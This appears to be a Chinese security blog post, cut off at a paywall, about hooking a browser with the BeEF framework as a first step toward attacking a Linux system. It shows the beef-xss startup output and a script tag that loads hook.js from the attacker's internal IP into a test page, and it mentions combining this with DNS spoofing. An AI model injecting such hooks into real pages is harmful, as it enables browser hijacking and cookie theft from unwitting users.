内网渗透小计之从劫持浏览器客户端到渗透Linux系统全过程

原创 于 2024-01-31 16:33:35 发布
· 982 阅读 · 23 ·
版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux #运维 #服务器

本机是Ubuntu系统 所以我们直接本机实战好了 大晚上的 睡不着 写篇文章在睡

先来讲一下劫持浏览器
劫持浏览器用到的工具为beef-xss
在Ubuntu中 如果你想安装的话 直接吧kali源添加进去后
apt-get install beef-xss //安装
打开的话 直接beef-xss
如下图

root@xaiSec:/home/hacker# beef-xss Please wait as BeEF services are started. You might need to refresh your browser once it opens. UI URL: [url]http://127.0.0.1:3000/ui/panel[/url] Hook: <script src="http://<IP>:3000/hook.js"></script> Example: <script src="http://127.0.0.1:3000/hook.js"></script>

然后他会自动弹出一个网站http://127.0.0.1:3000/ui/authentication
网站是beef-xss平台 就相当于xss平台一样  用于接收cookie等信息的
<script src=”http://<IP>:3000/hook.js”></script>  ip改成我们本机在内网中的ip即可
ifconfig 查看
192.168.0.3
那么 xss在内网中的链接为 192.168.0.3:3000/hook.js
打开看一下 会看到一些代码 这里我们不用管他
直接吧xss代码加入到html里面
当然也可以配合dns欺骗 和xerosploit的话会达到更好的效果 这里就不演示了
接着我们来打开test.html一下
test.html 里面有我们的xss代码
如下图
这个时候我们的beef-xss平台以及提示上线
双击192.168.0.3
因为我们这是本机测试的
双击后就会看到我们的浏览器版本信息 客户端信息等

表单如下

Browser Version: UNKNOWN


Initialization



Browser UA String: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0


Initialization



Browser Language: zh-CN


Initialization



Browser Platform: Linux x86_64


Initialization



Browser Plugins: IcedTea-Web Plugin (using IcedTea-Web 1.6.2 (1.6.2-3.1ubuntu3)),Shockwave Flash


Initialization



Window Size: Width: 1153,
最低0.47元/天 解锁文章
Cyber FISH
关注
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值